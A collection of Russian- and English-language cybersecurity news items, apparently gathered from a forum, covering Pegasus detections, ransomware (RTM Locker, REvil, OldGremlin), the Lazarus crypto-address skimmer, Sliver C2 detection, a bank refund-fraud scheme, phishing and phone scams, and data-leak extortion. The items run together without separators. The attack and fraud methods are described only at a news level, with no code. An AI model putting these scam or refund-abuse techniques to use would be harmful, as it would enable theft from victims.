Когда мы запустили функцию Mobile Threat Hunting, мы не знали, что оспорим все, что технологический мир думал о безопасности мобильных устройств. Мы создали решение, которое поставило мощное обнаружение угроз прямо в руки пользователей — полный скан на угрозы, который занимает всего пять минут, прямо на их смартфоне.
Что произошло дальше, стало настоящим открытием. В рамках запуска функции мы предложили нашим пользователям один раз провести охоту на угрозы с помощью нашего приложения iVerify. К нашему удивлению, без единой рекламы 2500 наших пользователей согласились провести сканирование своих устройств. (Примечание: если вы являетесь текущим пользователем приложения iVerify, вы все ещё можете пройти этот скан. Если нет, скачайте приложение и сканируйте своё устройство). Результаты этих сканирований подтвердили то, что мы уже подозревали: если искать — вы найдете. Мы обнаружили семь заражений Pegasus — число, которое может показаться небольшим, но это огромный сигнал тревоги в мире мобильной безопасности.
Это были не только свежие заражения. Наш анализ показал сложную хронологию компрометаций: одно заражение с конца 2023 года на iOS 16.6, другое потенциальное заражение Pegasus в ноябре 2022 года на iOS 15 и пять более старых заражений, датируемых 2021 и 2022 годами на iOS 14 и 15. Каждое из этих устройств могло быть тихо подслушано, данные были скомпрометированы без ведома владельца.
Это открытие подтвердило нашу гипотезу о широком распространении шпионского ПО на мобильных устройствах — оно скрывается на виду и не обнаруживается традиционными средствами безопасности.
Наше исследование показало, что на каждые 1000 сканирований было найдено 2,5 зараженных устройства — это значительно выше, чем в любых ранее опубликованных отчетах. Однако важно понять контекст этих данных:
Результаты показали критическую истину: мы можем понять реальный масштаб угроз для мобильных устройств, только если будем смотреть внимательно. Демократизируя обнаружение вредоносных программ, мы не только защищаем устройства, но и проливаем свет на самые тёмные уголки мобильной безопасности, давая пользователям возможность понять и защититься от угроз, которые раньше оставались невидимыми.
Это было не просто техническое достижение. Это был фундаментальный сдвиг в нашем подходе к мобильной безопасности — возвращение власти пользователям, один пяти минутный скан за раз.
Разработанный группой NSO, также известной как Rainbow Ronin, Pegasus представляет собой вершину технологий инвазивного шпионского ПО:
Наше расследование в мае 2024 года выявило несколько вариантов Pegasus:
Я представлю подробный анализ образца Pegasus в эту пятницу на OBTS v7.0. Если вы не присутствуете на мероприятии, сессия будет транслироваться в прямом эфире. В ближайшие недели я также опубликую техническую статью, в которой разберу этот образец и поделюсь им с отраслью.
Традиционные модели безопасности не способны улавливать все нюансы угроз для мобильных устройств. Ранее детекции Pegasus были редкостью из-за отсутствия эффективных решений для их выявления, но с улучшением методов обнаружения и устранения угроз мы считаем, что компрометаций гораздо больше, чем это принято считать.
Как сказал Пауэрс: «Вы не можете увидеть то, чего не понимаете. Но то, что вы думаете, что уже понимаете, вы не заметите». Как индустрия, мы считаем, что безопасность мобильных устройств на хорошем уровне, но если бы мы потратили немного времени, чтобы проверить устройства, мы бы поняли, что угроза гораздо серьёзнее, чем мы думали.
Хорошая новость заключается в том, что мы создали возможность делать это в масштабе и при соблюдении конфиденциальности. Наши расследования раскрывают критическую истину: мы не можем понять масштаб угроз для мобильных устройств, пока не будем смотреть внимательно. iVerify привержен тому, чтобы выводить эти скрытые угрозы на свет и защищать отдельных пользователей и организации в мире, который становится всё более сложным в цифровом плане.
Программы-вымогатели для Linux
Злоумышленники, стоящие за RTM Locker, разработали штамм программы-вымогателя,
способный атаковать машины Linux, что стало первым набегом группы на
операционную систему с открытым исходным кодом.
«Его программа-вымогатель для шкафчиков заражает хосты Linux, NAS и ESXi и, похоже, вдохновлена утечкой исходного кода программы-вымогателя Babuk », — говорится в новом отчете Uptycs , опубликованном в среду. «Он использует комбинацию ECDH на Curve25519 (асимметричное шифрование) и Chacha20 (симметричное шифрование) для шифрования файлов».
RTM Locker был впервые задокументирован Trellix ранее в этом месяце, описывая его разработчиков как частного поставщика программ-вымогателей как услуги (RaaS). Он берет свое начало в группе киберпреступников под названием Read The Manual (RTM), которая, как известно, активна как минимум с 2015 года.
Группа известна тем, что намеренно избегает громких целей, таких как критическая инфраструктура, правоохранительные органы и больницы, чтобы привлечь как можно меньше внимания. Он также использует аффилированных лиц для выкупа жертв, в дополнение к утечке украденных данных, если они отказываются платить.
Разновидность Linux специально предназначена для выделения хостов ESXi путем завершения работы всех виртуальных машин, работающих на скомпрометированном хосте, до начала процесса шифрования. Точный первоначальный заразитель, использованный для доставки программы-вымогателя, в настоящее время неизвестен.
Хосты NAS и ESXi
«Он статически компилируется и удаляется, что усложняет обратный инжиниринг и
позволяет исполняемому файлу работать на большем количестве систем», —
объяснил Uptycs. «Функция шифрования также использует pthreads (также
известные как POSIX-потоки ) для ускорения выполнения».
После успешного шифрования жертвам рекомендуется связаться со службой поддержки в течение 48 часов через Tox, иначе они рискуют опубликовать свои данные. Для расшифровки файла, заблокированного с помощью RTM Locker, требуется открытый ключ, добавленный в конец зашифрованного файла, и закрытый ключ злоумышленника.
Это произошло после того, как Microsoft сообщила , что уязвимые серверы PaperCut активно используются злоумышленниками для развертывания программ- вымогателей Cl0p и LockBit.
Организовал мошенническую схему 27-летний житель города Харькова, который привлек к участию еще семерых пособий и исполнителей
По данным следствия, фигуранты звонили латвийцам и предлагали вложить деньги в криптовалюту или акции и зарабатывать на процентах. Если потерпевшие соглашались, им предоставляли ссылку, по которой они переходили, а преступники получали доступ к их компьютерам и устанавливали на них личный кабинет мошеннической платформы.
Преступники, для правдоподобия своей сделки, создали и наполнили контентом интернет-сайты и псевдотрейдинговые платформы, которые постоянно администрировать для создания у потерпевших представление, что торговля на самом деле происходит и средства действительно вовлечены в финансовые инвестиции.
Когда же потерпевшие говорили интернет-злоумышленникам, что хотят вывести средства с якобы начисленными процентами, мошенники уверяли, что для этого надо ждать или же скоро будет рост акций и надо предоставить средства, чтобы реализовать транзакцию.
Киберполицейские выяснили, что перечисленные средства поступали на подконтрольные криптовалютные кошельки участников преступной организации и в дальнейшем выводились в наличные через подконтрольные обменные пункты.
Организовал мошенническую схему 27-летний житель города Харькова, который привлек к участию еще семерых пособий и исполнителей.
Киберполицейские идентифицировали их личности и местонахождение. По адресам их деятельности и проживания полицейские провели двадцать обысков, в ходе которых задержали пятерых фигурантов, включая организатора. Изъяты документы и техника с контактами и переписками с потенциальными жертвами, сим-карты латвийских операторов, граната, средства в размере около 160 000 долларов, 250 000 грн и 5 элитных авто.
Следователи Нацполиции объявили задержанным о подозрении за мошенничество, совершенное в особо крупных размерах в составе преступной организации (ч. 5 ст. 190 Уголовного Кодекса Украины), создании и участии в преступной организации (ч. 1 ст. 255, ч.2 ст. 255 Уголовного Кодекса Украины). Всем подозреваемым избраны меры пресечения в виде содержания под стражей без права внесения залога.
Досудебное расследование продолжается. Лица трех других участников мошеннической сделки устанавливаются.
• Video:
Государственный департамент США предложил вознаграждение в размере до пяти миллионов долларов за информацию, которая поспособствует аресту 40-летнего гражданина Швеции Максимилиана Ривкина Maximilian Rivkin. Он подозревается в том, что был администратором сервиса зашифрованной связи для телефонов Anom, известных, как телефоны для мафии.
Власти Соединенных Штатов разыскивают Ривкина с 2021 года, когда ФБР, Европол и силовики многих стран в рамках операции «Троянский щит» провели одновременные аресты членов организованных преступных сообществ, за которыми велось наблюдение с помощью разработанного в ФБР телефона Anom. Американские правоохранительные органы до сих пор подвергаются критике за то, что подвергли уголовному преследованию распространителей устройств, которые, по сути, и вывели различные государства мира на членов мафиозных кланов.
Начиная с 2018 года более 12 тысяч устройств Anom было продано 300 преступным синдикатам, включая итальянскую и албанскую мафию, наркосиндикаты в юго- восточной Азии и другие организованные преступные группировки.
«Пользователи, полагая, что их устройства защищены от правоохранительных органов щитом непробиваемого шифрования, открыто обсуждали способы сокрытия и перевозки наркотиков, отмывания денег, а в некоторых группах — насильственные угрозы», — говорится в обвинительном заключении.
Ривкин стал одним из 17 иностранных граждан, которым власти США предъявили обвинения в предполагаемом распространении устройств, созданных ФБР. Сообщения, отправленные Ривкиным на платформе, связывали его со практически со всеми перечисленными деяниями, а также с заговорами с целью убийства или похищения людей. Госдеп признается, что установить местонахождение гражданина Швеции не удалось, однако его легко узнать по шрамам на левом колене и пальцах, а также по татуировке с изображением трех обезьян на правой руке.
source:
state.gov/u-s-department-of-state-announces-a-reward-offer-for-swedish-
transnational-criminal
therecord.media/maximilian-rivkin-fbi-europol-reward-anom-encrypted-phones
Крупные и опытные группировки уже перешли на open-source инструмент Sliver.
Согласно [отчету](https://www.microsoft.com/security/blog/2022/08/24/looking-
for-the-sliver-lining-hunting-for-emerging-command-and-control-frameworks/)
Microsoft, правительственные хакеры, кибепреступные группировки и другие
субъекты угроз стали чаще использовать в атаках кроссплатформенный open-source
инструмент тестирования безопасности
Sliver на основе Go, разработанный ИБ-
компанией BishopFox.
Вымогательская группировка DEV-0237 (
FIN12 ) уже перешла на Sliver, а
также российская группа APT29
(Cozy Bear, The Dukes, Grizzly Steppe) использовала Sliver для поддержания
доступа к скомпрометированным
средам
.
Также Sliver разворачивается с помощью загрузчика
Bumblebee (Coldtrain), который
разработала Conti в качестве замены BazarLoader.
Несмотря на то, что Sliver – это новая угроза, существуют методы обнаружения
ее вредоносной активности. C&C-сервер Sliver поддерживает несколько протоколов
(DNS, HTTP/TLS, MTLS, TCP) и подключение имплантатов, а также может размещать
файлы, имитирующие законный веб-сервер. Поэтому ИБ-специалисты могут настроить
прослушиватели для выявления инфраструктуры Sliver в сети.
Microsoft также поделилась информацией о том, как обнаруживать полезные
нагрузки Sliver (шелл-код, исполняемые файлы, DLL-библиотеки и службы).
Специалисты могут настроить систему обнаружения для конкретного загрузчика
или, если шелл-код не запутан, правила для полезной нагрузки шелл-кода.
эSliver также использует объектные файлы Beacon (Beacon Object Files, BFO),
NET-приложения и другие сторонние инструменты для внедрения команд. Фреймворк
также использует PsExect для запуска команд, обеспечивающих боковое
перемещение.
Чтобы организациям было проще идентифицировать активность Sliver в своей среде, Microsoft создала набор поисковых запросов для команд Sliver, которые можно запускать на портале [Microsoft 365 Defender](https://docs.microsoft.com/ru- ru/microsoft-365/security/defender/microsoft-365-defender?view=o365-worldwide) .
Наборы правил обнаружения и руководство по поиску предназначены для общедоступной кодовой базы Sliver.
Уроженец Екатеринбурга Андрей Кирсанов признал вину по первому в России уголовному делу из-за читов для компьютерной игры World of Tanks, передает корреспондент ТАСС из зала Верх-Исетского районного суда города.
Ранее постановлением Черемушкинского суда Москвы дело в отношении Кирсанова было направлено по подсудности в Верх-Исетский районный суд Екатеринбурга.
"Признаю", - сказал Кирсанов, отвечая на вопрос судьи, признает ли он вину.
В отношении Кирсанова возбуждено уголовное дело по ч. 2 ст. 273 УК РФ ("Создание и распространение вредоносных компьютерных программ"). Он обвиняется в создании сайта по продаже вредоносных программ для игр World of Tanks и World of Warships. Ущерб разработчику игр от действий обвиняемого следствие оценило в 670 млн рублей.
Кирсанов стал первым в России обвиняемым в совершении киберпреступления в области игровой индустрии. Максимальное наказание по этой статье - пять лет лишения свободы.
source: tass.ru/ekonomika/15055267
Hackers linked with the North Korean government applied the web skimming technique to steal cryptocurrency in a previously undocumented campaign that started early last year, researchers say.
The attacks compromised customers of at least three online stores and relied on infrastructure used for web skimming activities and attributed in the past to Lazarus APT, also known as Hidden Cobra.
In research published last year, Dutch cyber-security company Sansec exposed
Lazarus operations that had been going since 2019 to
capture payment card data from online shoppers at large retailers in the U.S.
and Europe.
The malicious JavaScript code (also referred to as JS-sniffer or web skimmer) used in those attacks collected the payment card details that customers entered on the checkout page.
One of the campaigns, tracked as “clientToken=” because of a string hidden in the code, started in May 2019. The ID of the campaign and the JS-sniffer used in the attacks point to Lazarus activity aimed at stealing cryptocurrency.
An investigation from researchers at Group-IB cybersecurity company that started from Sansec’s discovery revealed that the North Korean hackers in 2020 also attacked online shops that accepted payments in cryptocurrency.
The attackers modified the malicious JavaScript from the “clientToken=” campaign so that it replaced the store’s Bitcoin address with one they controlled. This way, online shoppers’ money would end up in the attacker’s wallet.
Lazarus BTC Changer source code snippet
Referring to the malicious script as Lazarus BTC Changer, Group-IB researchers say that it had the same names of functions as the skimmer used in the “clientToken=” campaign.
According to the research, the attackers started using the modified script in late February 2020 and used the same infrastructure that served previous web skimming activity. One such website was luxmodelagency[.]com.
Group-IB says that they found two compromised websites that loaded Lazarus BTC Changer, which had also been infected during the original “clientToken=” campaign [described by Sansec](https://sansec.io/research/north-korea- magecart): Realchems and Wongs Jewellers.
Of the two, though, only Realchems accepted payment in cryptocurrency. The researchers believe that in the case of Wongs Jewellers the threat actor had added the malicious script in error.
At one point, Lazarus BTC Changer was also present at a third victim, an Italian luxury clothes shop but at the time of the analysis the script had been removed from the website, the researchers say.
“Like all traditional JS-sniffers, Lazarus BTC Changer detects when users are
on the checkout page of an infected website, but instead of collecting bank
card details, it replaces the BTC or ETH address owned by the shop with an
address used by the hackers” - [Group-IB](https://www.group-
ib.com/blog/btc_changer)
The actor made some changes to the technique in late March 2020, when they
added a fake payment form in the script that opened in an iframe element on
the page.
What this achieved was that the store’s BTC wallet no longer had to be replaced and the customer would send the cryptocurrency directly to the threat actor’s address.
Lazarus
BTC Changer fake pay form
The researchers say that the same form was used for all targets, even if it
appears tailored for one victim, Realchems. The actor then used the SingleFile
browser extension to save it.
Looking closer at the code, Group-IB found that it had been saved discovered another hint pointing to a Korean actor: the Korean text for Greenwich Mean Time in a comment created by SingleFiles when saving a web page, suggesting the use of a system with Korean locale.
Despite the campaign starting early last year, it appears that the actor did not make much money. A set of four cryptocurrency addresses extracted from the malicious script indicate a profit.
However, only the first two Bitcoin wallets were active during the Lazarus BTC Changer campaign. The third Bitcoin address had only one transaction from January 7 and the Ethereum wallet had been active since July 2019 and could have served other operations.
Based on the transactions, though, Group-IB was able to determine that at the time of withdrawing the cryptocurrency the attackers transferred less than one Bitcoin, which was worth close to $8,500.
The researchers tracked all outgoing transactions from the BTC addresses found in Lazarus BTC Changer samples and found that they all went to a single address.
Previous activity connected to attacker’s addresses suggests that they used the payment service provider CoinPayments, which integrates with online shops and payment gateways for cryptocurrency support.
If CoinPayments was indeed used by this threat actor to transfer funds to other cryptocurrency addresses, the company’s Know Your Customer (KYC) policy could help identify whoever carried out the attacks, at least in theory.
It should be noted that there are methods and services that cybercriminals can use to hide their identity despite KYC policies.
The small scale of the campaign makes researchers believe that this was just a test run for a new set of tools and tactics that could be used on larger targets at a later time.
Based on the evidence revealed through Sansec research and its own, Group-IB attributes these attacks to the North Korean group of hackers with a high level of confidence.
werewolves[.]pro/ru/
зачем взламывать Родину?
June 14, 2021

Source: Defense.gov
US nuclear weapons contractor Sol Oriens has suffered a cyberattack allegedly at the hands of the REvil ransomware gang, which claims to be auctioning data stolen during the attack.
Sol Oriens describes itself as helping the "Department of Defense and Department of Energy Organizations, Aerospace Contractors, and Technology Firms carry out complex programs."
However, [job postings](https://lensa.com/sol-oriens- llc/jobs/c/d275e6522746a584bae986297bccf16d1a070c51#jobs) first spotted by CNBC correspondent Eamon Javers provide some insight into Sol Orien's operations, who are seeking program managers, consultants, and a 'Nuclear Weapon System Subject Matter Expert' to work with the [National Nuclear Security Administration](https://www.energy.gov/nnsa/national-nuclear-security- administration) (NNSA).
"Sol Oriens LLC currently has an opening for a Senior Nuclear Weapon System Subject Matter. Expert with more than 20 years of experience with nuclear weapons like the W80-4. This. Subject Matter Expert works with NNSA Federal and other Contractor personnel to organize,. coordinate, implement, and manage technical program activities for the W80-4 Life Extension. Program.," says one of the [job postings](https://lensa.com/senior-nuclear-weapon-system-subject- matter-expert-jobs/albuquerque- nm/hjp/625db000af48ec9d44076c26639e92a4986d2d91a2b45d2887ac1e0851512029).
"Position Responsibilities. Planning and managing nuclear weapon life extension programs and associated. stockpile management as they relate to the maintenance of a highly reliable and safe. nuclear deterrent."
Last week, the REvil ransomware operation listed companies whose data they were auctioning off to the highest bidder.
One of the listed companies is Sol Oriens, where REvil claims to have stolen business data and employees' data, including salary information and social security numbers.
As proof that they stole data during the attack, REvil published images of a hiring overview document, payroll documents, and a wages report.
As a way to pressure Sol Oriens into paying the threat actor's extortion demands, the ransomware gang threatened to share "relevant documentation and data to military angencies (sic) of our choise (sic)."

Threat to share stolen data with military agencies
In a statement shared by Javers on Twitter, Sols Oriens confirmed a cyberattack in May 2021 that affected their network.
"The investigation is ongoing, but we recently determined that an unauthorized individual acquired certain documents from our systems."
"Those documents are currently under review, and we are working with a third- party technological forensic firm to determine the scope of potential data that may have been involved."
"We have no current indication that this incident involves client classified or critical security-related information. Once the investigation concludes, we are committed to notifying individuals and entities whose information is involved."
Like many other ransomware operations, REvil is believed to be operating out of Russia or another CIS country.
Over the weekend, G7 leaders issued a statement asking Russia to help disrupt ransomware gangs believed to be operating within its borders.
President Biden will also be discussing the recent ransomware attacks with Russian President Vladimir Putin at the June 16th Geneva summit.
https://www.bleepingcomputer[.]com/news/security/revil-ransomware-hits-us- nuclear-weapons-contractor/
Центральный районный суд Николаева рассматривает дело мошенника, который похитил 5.1 миллиона гривен в украинском банке Банк Восток и отмыл их через крупнейшую криптобиржу мира Binance . Злоумышленником стал студент- четвертокурсник Черноморского национального университета имени Петра Могилы.
Студент вместе с группой сообщников искали знакомых, которые регистрировали новые банковские счета через собственное «Действие» и предоставляли доступ (логин/пароль) к своим счетам в приложении «Банк Восток». Получив доступ к банковским счетам, злоумышленники производили фиктивные платежи с помощью функции рефанд, получая перечисленные средства обратно. «В связи с тем, что возврат средств на карту клиента (refund) производился онлайн, злоумышленники получили возможность воспользоваться доступными средствами на банковских счетах до получения подтверждения от платежных систем», — пояснили следователи .
Когда деньги поступали на карточки, студент и его сообщники покупали USDT на Binance , пользуясь услугой Р2Р. После этого они переводили полученную криптовалюту на кастодиальный криптогаманец в сети TRX.
"ПАО "Банк Восток" не только обнаружил мошеннические действия, связанные с проведением refund транзакций, и успешно устранил эту уязвимость сразу же в день ее обнаружения, но и прилагает усилия для привлечения злоумышленников к ответственности", - сообщили представители банка .
Пока организатор мошеннической схемы находится под стражей в ГУ «Николаевский следственный изолятор». Размер залога — 4 962 000 грн, такую сумму готов заплатить отец злоумышленника, однако суд решил не отпускать мошенника под домашний арест из-за возможности побега. Николаевском Мавроди, именно так прозвали злоумышленника в соцсетях, грозит от 5 до 12 лет лишения свободы с конфискацией имущества.
Официально стартовавшая разработка под эгидой ООН всеобъемлющей конвенции по
борьбе с информпреступностью должна завершиться в течение двух с половиной
лет. Об этом сообщил во вторник заместитель директора Департамента
международной информационной безопасности МИД РФ Дмитрий Букин.
Это будет всеобъемлющая универсальная концепция по борьбе с информационной
преступностью. Она создается в рамках учрежденного по инициативе России
специального межправительственного комитета открытого состава.
Он подчеркнул, что Россия предложила правила работы комитета, позволяющие "посадить за стол переговоров даже те страны, которые изначально выступали против этой идеи, которые голосовали против резолюции Генеральной Ассамблеи ООН" по созданию этого органа. "Одним словом, наше российское видение того, как должна создаваться первая в истории универсальная конвенция по борьбе с киберпреступностью, было принято", - , цитирует ТАСС слова российского дипломата.
По словам дипломата, Москва еще два года назад твердо отстаивала саму идею создания подобной универсальной конвенции. Сейчас же мировое сообщество, "теряя каждый месяц порядка $500 млрд от киберпреступлений", спорит о том, на каких основах будет работать спецкомитет.
Информация поступила сразу от нескольких анонимных источников.
Утром 14 марта сайт Wildberries прекратил полноценную работу. В администрации
компании заявили, что причины прекращения работы сайта сугубо технические,
однако его работа не может быть восстановлена уже второй день.
По информации сразу из нескольких источников, сайт Wildberries был взломан
иностранной группировкой хакеров OldGremlin, которые не только нарушили работу
сайта, но и захватили над ним контроль.
Хакеры из OldGremlin поместили в данные сайта вирус-шифровальщик, который и стал причиной масштабного сбоя в работе Wildberries
Утром 14 марта пользователи интернет-магазина Wildberries стали массово
жаловаться на сбой в работе сервиса, причем как на стационарный, так и на
мобильное приложение.
По информации Wildberries, к 20:00 IT-специалисты компании устранили более 70%
ошибок в работе сайта и приложений. В мобильных приложениях пользователи уже
могут оформлять и оплачивать заказы. В скором времени будут исправлены ошибки
по оформлению заказов на сайте.
«Wildberries взломали русские хакеры и уничтожили почти всю инфраструктуру, включая резервные копии. Данные зашифрованы»,— пишет автор Telegram-канала «Запуск завтра» Самат Галимов, который ранее работал техническим директором в «Медузе» (признана иноагентом), Pure, Bookmate и RAWG. По его мнению, взлом был совершен изнутри, поскольку компания относилась к защите довольно серьезно.
Об OldGremlin стало известно 2 года назад, когда специалисты Group-ib
рассказали о новой русскоязычной киберпреступной
группировке , которая в течение
последних шести месяцев неоднократно и целенаправленно атаковала российские
компании и организации с помощью вредоносных программ и вымогательского ПО. Ей
принадлежит рекорд по максимальной сумме запрашиваемого выкупа — в 2021 году
они рассчитывали получить от жертвы 250 миллионов рублей.
Подробнее:
https://www.securitylab.ru/news/530579.php
Сотрудники уголовного розыска УМВД России по городскому округу Королёв задержали двоих жителей Казани, подозреваемых в мошенничестве в особо крупном размере.
Установлено, что в течение нескольких дней 80-летней местной жительнице звонили мужчина и женщина, которые представлялись сотрудниками полиции и Центробанка. Для правдоподобности, звонившие направили фотографии своих служебных удостоверений. Они предупреждали пенсионерку о том, что с её банковских карт мошенники пытаются похитить деньги и советовали перевести денежные средства на якобы надёжные счета. Пожилая женщина, доверившись собеседникам, выполнила их рекомендации, сняла свои сбережения – около 800 тысяч рублей, и перевела на указанные ими счета.
Спустя неделю эти же люди под тем же предлогом убедили потерпевшую продать квартиру. Пенсионерка по их просьбе заключила договор купли-продажи в одном из агентств недвижимости в г. Москве, а вырученные денежные средства – 5,5 миллиона рублей, также перевела злоумышленникам якобы на «безопасные счета».
Когда мошенники перестали выходить на связь, женщина поняла, что её обманули, и обратилась в правоохранительные органы.
По данному факту следствием полиции возбуждено уголовное дело по признакам преступления, предусмотренного ст. 159 Уголовного кодекса Российской Федерации.
В результате оперативно-розыскных мероприятий оперативники установили и задержали двоих жителей г. Казани 49 и 53 лет, на счета которых поступали денежные средства заявительницы. Мужчины пояснили, что полученные деньги пересылали дальше – своим соучастникам.
Задержанным избрана мера пресечения в виде заключения под стражу.
В настоящее время расследование продолжается, устанавливается причастность к незаконной деятельности иных лиц.
video:
Жителю Пхукета, заработавшему 1000 бат за открытие счетов для мошенников, грозит до 3 лет тюрьмы и/или до 300 тыс. бат штрафа. Фото: CIB Thailand
Как следует из пресс-релиза CIB, в 2023 года Наттапхонг открыл два банковских счета «для друзей» и получил за это вознаграждение в 1 тыс. бат. Затем через счета мужчины началась прокачка крупных сумм денег, которая его по неким причинам совершенно не беспокоила.
В сентября 2023 года был выдан первый ордер на арест Наттапхонга, а в марте 2024 года – второй. В обоих случаях обвинения сформулированы в рамках Закона о компьютерных преступлениях. Мужчин обвиняется в соучастии во внесении в компьютерную систему ложных данных, способных нанести ущерб другим лица.
Согласно пресс-релизу CIB, арестованный на этой неделе Наттапхонг отверг выдвинутые против него обвинения. При этом он признал факт открытия банковских счетов в интересах третьих лиц, что само по себе является нарушением закона. Даже без учета мошенничества Наттапхонгу грозит до 3 лет тюрьмы просто за открытие счетов для других лиц.
«Центральное бюро расследований (CIB) предупреждает лиц, открывающих банковские счета для других людей за вознаграждение, о противозаконности таких действий. Нарушение карается тюремным сроком до трех лет и/или штрафов в размере до 300 тыс. бат. Если счета использовались в преступных целях, человек может быть привлечен за сооучастие в соответствующих преступлениях»
Click to expand...
Full phone number database of
#Clubhouse is up
for sale on the
#Darknet. It contains
3.8 billion phone numbers. These are not just members but also people in
contact lists that were synced. Chances are high that you are listed even if
you haven't had a Clubhouse login.
https://twitter.com/mruef/status/1418693478574346242
Киберпреступник опубликовал 10 тысяч строк данных клиентов Optus и угрожал выкладывать по 10 тысяч записей ежедневно, если не будет заплачен выкуп.
Вчера анонимный пользователь под ником optusdata опубликовал данные 10 тыс. пользователей австралийского мобильного оператора Optus и потребовал $1 млн в криптовалюте.
Злоумышленник угрожал ежедневно публиковать данные 10 тыс. пользователей. Однако сегодня данных пост был удален. В новом сообщении optusdata принес извинения и пообещал удалить все украденные данные.
Optus - вторая по величине телекоммуникационная компания Австралии – ранее объявила, что из клиентской базы компании были украдены личные данные 9,8 миллионов человек.
Похищенные данные содержат имена, даты рождения, номера телефонов, адреса электронной почты и – для некоторых клиентов – адреса и номера водительских прав или паспортов.
Как отмечается, среди обнародованных хакером данных находятся адреса электронной почты министерства обороны Австралии, а также канцелярии премьер- министра и правительства страны.
Стоит отметить, что накануне министр внутренних дел Австралии раскритиковала оператора сотовой связи Optus после того, как компания не сумела защитить персональные данные своих клиентов. Надзор за хранением персональных данных жителей Австралии на серверах крупных компаний должен быть ужесточен, заявила министр.
source: theguardian.com/business/2022/sep/27/police-all-over-dark-web-ransom- threat-to-release-10000-customer-records-a-day-optus-ceo-says
Пациенты Integris Health в Оклахоме получают электронные письма с шантажом, в которых говорится, что их данные были украдены в результате кибератаки на сеть медучреждений, и если они не оплатят выкуп, данные будут проданы другим киберпреступникам.
Integris Health — крупнейшая некоммерческая сеть медучреждений штата Оклахома, США, включающая больницы, клиники и центры неотложной помощи по всему штату.
Integris Health подтвердила, что в ноябре компания подверглась взлому «определенных систем», который привел к краже данных пациентов.
Узнав о подозрительной деятельности, INTEGRIS Health незамедлительно предприняла шаги по обеспечению безопасности систем и начала расследование характера и масштабов кибератаки.
В электронных письмах, отправленных пациентам 24 декабря, хакеры утверждают, что они украли личные данные более 2 миллионов пациентов в результате кибератаки на Integris Health.
Украденные данные предположительно включают номера социального страхования, даты рождения, адреса, номера телефонов, информацию о страховании и информацию о работодателе.
Пациенты Integris Health сообщили, что электронные письма содержат действительную личную информацию, что подтверждает, что данные пациентов были украдены в результате атаки.
«Мы связались с Integris Health, но они отказываются решать проблему», — говорится в электронном письме пациентам. «Мы даем вам возможность удалить ваши личные данные из наших баз данных до того, как мы продадим всю базу данных брокерам данных 5 января 2024 года».
В электронных письмах содержится ссылка на сайт Tor, на котором перечислены украденные данные около 4 674 000 человек, включая их имена, номера социального страхования, даты рождения и информацию о посещениях больниц.
Сайт в даркнете с украденными данными
Веб-сайт содержит данные, добавленные в период с 19 октября по 24 декабря 2023 года. Сайт предлагает посетителям заплатить $50 за удаление записи данных или $3 за ее просмотр.
Integris Health знает об электронных письмах, отправленных пациентам, и обновила свое уведомление о безопасности , предупреждая получателей не отвечать, не связываться с отправителем и не переходить по ссылкам в электронном письме.
Хотя неизвестно, кто стоит за атакой на Integris Health, аналогичные электронные письма были отправлены пациентам Онкологического центра Фреда Хатчинсона (Fred Hutch) после того, как группа вымогателей Hunters International взломала системы больницы.
Электронные письма пациентам Fred Hutch также позволяли посетить сайт в даркнете и удалить свои данные, заплатив $50. Это указывает на то, что, вероятно, за атакой на Integris Health стоит та же самая группа вымогателей.
source: integrisok.com/landing/cyber-event
Злоумышленники зарабатывали миллионы евро с помощью фишинга и других мошеннических схем.
Операция была проведена полицией Бельгии и Нидерландов при поддержке Европола . Полиция Нидерландов арестовала девять человек – восемь мужчин и одну женщину в возрасте от 25 до 36 лет, а также обыскала 24 дома в стране.
Полиция изъяла у подозреваемых огнестрельное оружие, электронику, ювелирные изделия, наличные деньги и криптовалюту. Расследование было начато бельгийскими властями, и арестованные в Нидерландах злоумышленники будут переданы Бельгии.
По данным полиции, подозреваемые занимались фишингом и другими интернет- аферами, которые помогли им заработать миллионы евро. Киберпреступники отправляли жертвам электронные письма, текстовые сообщения и сообщения в WhatsApp со ссылкой на фальшивый веб-сайт банка, который был предназначен для сбора учетных данных цели. Собрав данные, злоумышленники получали доступ к банковскому счету жертвы.
“Мошенники использовали денежных мулов для перевода и обналичивания средств со счетов жертв. Члены группы также были связаны с уголовными делами о обороте наркотиков и огнестрельного оружия", – говорится в сообщении Европола.
source: europol.europa.eu/media-press/newsroom/news/phishing-gang-behind- several-million-euros-worth-of-losses-busted-in-belgium-and-netherlands
Скептики уже предупреждают о возможных последствиях нововведения.
WordPress с 1 октября 2024 года вводит новое обязательное требование для
аккаунтов с доступом к обновлениям плагинов и тем — включение двухфакторной
аутентификации (2FA). Этот шаг направлен на усиление безопасности и
предотвращение несанкционированного доступа.
По словам представителей WordPress, такие аккаунты имеют возможность вносить изменения в плагины и темы, которые используются миллионами сайтов по всему миру, поэтому их защита является приоритетом для сохранения безопасности и доверия сообщества.
Кроме обязательного 2FA, WordPress.org представил новую функцию — пароли SVN. Это отдельные пароли для внесения изменений в код, которые позволяют отделить доступ к репозиториям от основных учётных данных пользователей. По сути, это дополнительный уровень безопасности, который снижает риск утечки основного пароля и даёт возможность легко отозвать доступ к SVN без изменения учётных данных.
Технические ограничения не позволяют внедрить 2FA для существующих кодовых репозиториев, поэтому было решено использовать комбинацию двухфакторной аутентификации на уровне аккаунта, паролей SVN с высокой стойкостью и других мер безопасности, включая подтверждение релизов.
Эти меры направлены на предотвращение атак, при которых злоумышленники могут получить доступ к учётной записи разработчика и внедрить вредоносный код в плагины и темы, что может привести к крупномасштабным атакам на цепочку поставок.
Основным риском, который может возникнуть с введением обязательной двухфакторной аутентификации, является возможное неудобство для разработчиков. Некоторые пользователи могут столкнуться с трудностями при настройке 2FA, что может замедлить их работу или привести к временной потере доступа к своим учётным записям. Кроме того, внедрение новой системы паролей SVN требует адаптации, что может вызвать дополнительные вопросы у разработчиков, привыкших к стандартным методам аутентификации.
Однако в долгосрочной перспективе эти меры должны значительно улучшить общую безопасность экосистемы WordPress. По сути, негативные последствия могут быть связаны лишь с временными неудобствами, тогда как польза от повышенной защиты аккаунтов и предотвращения атак на цепочки поставок плагинов и тем очевидна.
Объявление было сделано на фоне недавних предупреждений компании Sucuri о продолжающейся вредоносной кампании ClearFake, направленной на WordPress- сайты. Злоумышленники распространяют вредоносное ПО RedLine, заставляя пользователей вручную запускать PowerShell для «устранения проблем» с отображением страниц. Кроме того, киберпреступники используют заражённые сайты PrestaShop для кражи данных кредитных карт на страницах оплаты.
